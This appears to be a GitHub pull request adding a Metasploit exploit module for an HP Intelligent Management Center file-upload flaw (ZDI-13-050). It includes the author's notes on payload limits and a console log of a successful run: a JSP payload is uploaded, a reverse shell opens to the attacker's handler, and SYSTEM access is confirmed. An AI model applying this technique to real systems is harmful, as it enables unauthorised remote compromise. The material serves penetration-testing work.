Added module for ZDI-13-050 #1649

Merged
merged 2 commits into from Mar 25, 2013

jvazquez-r7
Contributor

Tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.

Native and Java platform payloads aren't used because of the handling of new lines in the vuln application. Also, there is a max upload length of 40k by default.

No compression, only archiving, is used to avoid exceptions when the Java vuln app decompresses the zip created with rex/zip => Errors on entry sizes and crc32.

On the other hand, the AutoDeploy on the Tomcat webapp server doesn't work.

Test:

msf exploit(hp_imc_mibfileupload) > check
[*] The target service is running, but could not be validated.
msf exploit(hp_imc_mibfileupload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.130:8080 - Uploading the JSP payload...
[*] 192.168.1.130:8080 - JSP payload uploaded successfully
[*] 192.168.1.130:8080 - Executing payload...
[*] Command shell session 3 opened (192.168.1.129:4444 -> 192.168.1.130:3798) at 2013-03-25 00:51:46 +0100
[+] Deleted 6GpaBU.jsp

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\iMC\client\bin>echo 955363237;echo GCVgyHlZjaPADQdKEfONZLmbfNQYsWQN
955363237;echo GCVgyHlZjaPADQdKEfONZLmbfNQYsWQN

C:\Program Files\iMC\client\bin>attrib.exe -r "6GpaBU.jsp" ; del.exe /f /q "6GpaBU.jsp" ; rm -f "6GpaBU.jsp" >/dev/null;echo OiiaXovNDoTNZZYvmdhhuWOCFYoDdWai

C:\Program Files\iMC\client\bin>whoami
whoami
nt authority\system

C:\Program Files\iMC\client\bin>exit
exit

[*] 192.168.1.130 - Command shell session 3 closed.  Reason: Died from EOFError
^C
Abort session 3? [y/N]  y

wchen-r7 merged commit d54687c into rapid7:master Mar 25, 2013
jvazquez-r7 deleted the hp_imc_mibfileupload branch November 18, 2014 15:49